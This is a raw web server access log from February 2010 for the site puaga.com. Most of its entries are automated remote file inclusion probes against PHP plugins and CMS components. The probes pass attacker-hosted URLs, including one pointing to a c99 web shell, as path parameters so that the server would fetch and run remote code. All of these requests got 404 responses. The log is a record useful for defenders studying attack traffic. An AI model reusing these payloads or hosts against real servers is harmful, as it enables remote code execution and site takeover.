65.60.10.18 - - [25/Feb/2010:09:55:59 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:55:59 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:56:00 -0800] "GET /logs/access_100217.log//include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:00 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:00 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:00 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:56:01 -0800] "GET /include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:01 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:56:02 -0800] "GET /logs//include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:08 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:56:08 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:56:17 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:56:17 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:56:17 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:29 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:29 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:30 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:57:39 -0800] "GET /logs/access_100217.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:57:40 -0800] "GET /logs/access_100218.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:57:40 -0800] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:57:40 -0800] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:53 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:53 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:57:54 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:58:15 -0800] "GET /include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:58:39 -0800] "GET /logs/access_100217.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:59:03 -0800] "GET ///write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:59:03 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:59:03 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:59:11 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.151 - - [25/Feb/2010:09:59:51 -0800] "GET /polteaser/ HTTP/1.0" 200 1553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
207.45.176.98 - - [25/Feb/2010:10:00:40 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.clashttp://www.saldiri.org/c99.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:02:52 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:02:52 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:02:52 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /logs/access_100223.log%20%20/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:03:07 -0800] "GET /logs/access_100223.log%20%20/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:08 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:09 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:10 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:10 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:11 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:12 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:12 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:03:13 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:13 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:13 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:13 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:20 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:20 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:21 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:03:58 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:04:00 -0800] "GET ///write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:04:00 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:04:00 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:07 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:07 -0800] "GET /logs/access_100217.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:07 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:10:04:11 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:11 -0800] "GET /logs/access_100203.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:16 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:16 -0800] "GET /logs/access_100217.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:16 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [25/Feb/2010:10:04:20 -0800] "GET /logs/access_100203.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:04:28 -0800] "GET /logs/access_100206.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:04:28 -0800] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:04:28 -0800] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:04:31 -0800] "GET /logs/access_100129.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:04:46 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:05:26 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:05:26 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:05:26 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:05:27 -0800] "GET /login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:05:27 -0800] "GET /logs//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:05:27 -0800] "GET /logs/access_100204.log//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:05:27 -0800] "GET /logs/access.log//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [25/Feb/2010:10:05:28 -0800] "GET /advanced_comment_system/admin.php?ACS_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [25/Feb/2010:10:05:34 -0800] "GET /logs//advanced_comment_system/admin.php?ACS_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [25/Feb/2010:10:05:35 -0800] "GET /logs/access_100207.log//advanced_comment_system/admin.php?ACS_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:05:36 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:05:59 -0800] "GET /logs/access_100126.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:05:59 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:00 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:02 -0800] "GET /logs/access_100130.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:06:20 -0800] "GET /login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:06:20 -0800] "GET /logs/access_100204.log//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:06:20 -0800] "GET /logs//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [25/Feb/2010:10:06:20 -0800] "GET /logs/access.log//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:41 -0800] "GET /logs/access_100126.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:41 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:41 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:06:43 -0800] "GET /logs/access_100130.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:07:31 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:07:32 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.109.127.201 - - [25/Feb/2010:10:07:34 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:08:09 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:08:09 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:08:09 -0800] "GET /logs/access_100124.log%20%20/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:10:08:29 -0800] "GET /logs/access_100218.log///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:08:39 -0800] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:08:39 -0800] "GET /logs/access_100126.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:08:41 -0800] "GET /logs///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:10:08:43 -0800] "GET /logs/access_100130.log%20%20///bbs//skin/ggambo7002_board/write.php?dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:10:09:41 -0800] "GET /logs/access_100204.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
